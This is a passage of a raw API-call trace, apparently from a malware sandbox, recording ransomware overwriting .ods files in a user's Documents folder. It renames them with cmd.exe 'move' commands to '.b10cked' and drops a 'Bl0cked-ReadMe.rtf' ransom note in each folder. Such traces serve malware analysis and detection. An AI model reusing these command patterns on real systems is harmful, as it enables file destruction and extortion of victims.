returned 0x0 [0137.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xb87b [0137.606] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0137.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0137.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xbd63 [0137.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0137.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xbd63 [0137.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.607] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5eb0, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5eb0, lpOverlapped=0x0) returned 1 [0137.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.608] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x5eb0, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x5eb0, lpOverlapped=0x0) returned 1 [0137.608] SetFilePointer (in: hFile=0x114, lDistanceToMove=-24240, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5eb3 [0137.608] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x5eb0, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x5eb0, lpOverlapped=0x0) returned 1 [0137.608] SetFilePointer (in: hFile=0x114, lDistanceToMove=-24240, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x5eb3 [0137.608] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x5eb0, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x5eb0, lpOverlapped=0x0) returned 1 [0137.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IJFqBHm_BK63v.ods", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0137.612] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IJFqBHm_BK63v.ods", cchWideChar=17, lpMultiByteStr=0x13286f4, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IJFqBHm_BK63v.ods", lpUsedDefaultChar=0x0) returned 17 [0137.612] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0xbd63 [0137.612] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0137.612] CloseHandle (hObject=0x114) returned 1 [0137.613] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\IJFqBHm_BK63v.ods", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFQBH~1.ODS") returned 0x2d [0137.613] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\") returned 0x21 [0137.614] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFQBH~1.ODS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFqBHm_BK63v.ods.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFQBH~1.ODS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\IJFqBHm_BK63v.ods.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xe0c, dwThreadId=0xe1c)) returned 1 [0137.631] CloseHandle (hObject=0x110) returned 1 [0137.631] CloseHandle (hObject=0x114) returned 1 [0137.632] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", cchLength=0x22 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\") returned 0x22 [0137.632] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\5OwEKsaDhMyqwxmS\\", cchLength=0x33 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\") returned 0x33 [0137.632] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\", cchCount1=34, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\5OWEKSADHMYQWXMS\\", cchCount2=51) returned 1 [0137.632] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", cchLength=0x22 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\") returned 0x22 [0137.632] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0137.632] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\", cchCount1=34, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0137.632] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0137.632] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0137.632] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0137.632] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\") returned 0x21 [0137.632] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0137.632] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0137.632] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x110, hThread=0x114, dwProcessId=0xde8, dwThreadId=0x664)) returned 1 [0137.637] CloseHandle (hObject=0x110) returned 1 [0137.637] CloseHandle (hObject=0x114) returned 1 [0137.637] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\bl0cked-readme.rtf")) returned 0x20 [0137.637] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0137.637] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0137.637] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0137.638] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.638] ReleaseMutex (hMutex=0xf8) returned 1 [0137.638] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.638] ReleaseMutex (hMutex=0xf8) returned 1 [0137.638] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.638] ReleaseMutex (hMutex=0xf8) returned 1 [0137.638] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0137.638] ReleaseMutex (hMutex=0xf8) returned 1 [0137.638] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods" (normalized: "c:\\users\\eebsym5\\documents\\2w7_ew\\xj2fmd\\iu1veicz.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0137.638] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.638] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13418 [0137.638] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.638] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=19442732607) returned 1 [0137.638] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.638] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13418 [0137.638] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.638] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.638] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13418 [0137.638] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.638] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.638] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x13418 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13418 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13418 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13418 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13418 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13418 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x13418 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0137.639] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x12f30 [0137.639] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0137.640] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0137.640] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.640] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x13418 [0137.640] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0137.640] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0137.641] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.641] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x13418 [0137.641] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0137.641] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.641] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9a0b, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9a0b, lpOverlapped=0x0) returned 1 [0137.641] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0137.641] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x9a0b, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x9a0b, lpOverlapped=0x0) returned 1 [0137.641] SetFilePointer (in: hFile=0x114, lDistanceToMove=-39435, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9a0d [0137.641] ReadFile (in: hFile=0x114, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x9a0b, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x9a0b, lpOverlapped=0x0) returned 1 [0137.642] SetFilePointer (in: hFile=0x114, lDistanceToMove=-39435, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x9a0d [0137.642] WriteFile (in: hFile=0x114, lpBuffer=0x1230018*, nNumberOfBytesToWrite=0x9a0b, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesWritten=0x12ec1c*=0x9a0b, lpOverlapped=0x0) returned 1 [0137.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="iu1VEIcz.ods", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0137.646] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="iu1VEIcz.ods", cchWideChar=12, lpMultiByteStr=0x131324c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iu1VEIcz.ods", lpUsedDefaultChar=0x0) returned 12 [0137.646] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x13418 [0137.646] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0137.646] CloseHandle (hObject=0x114) returned 1 [0137.647] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods") returned 0x34 [0137.647] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\") returned 0x28 [0137.647] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\xJ2fmd\\iu1VEIcz.ods.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x110, hThread=0x114, dwProcessId=0xde4, dwThreadId=0xd98)) returned 1 [0137.841] CloseHandle (hObject=0x110) returned 1 [0137.841] CloseHandle (hObject=0x114) returned 1 [0137.841] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0137.841] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\", cchLength=0x22 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\") returned 0x22 [0137.842] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", cchCount1=41, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\", cchCount2=34) returned 3 [0137.842] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\2w7_ew\\xJ2fmd\\", cchLength=0x29 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\") returned 0x29 [0137.842] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0137.842] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\2W7_EW\\XJ2FMD\\", cchCount1=41, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0137.842] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0137.842] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | 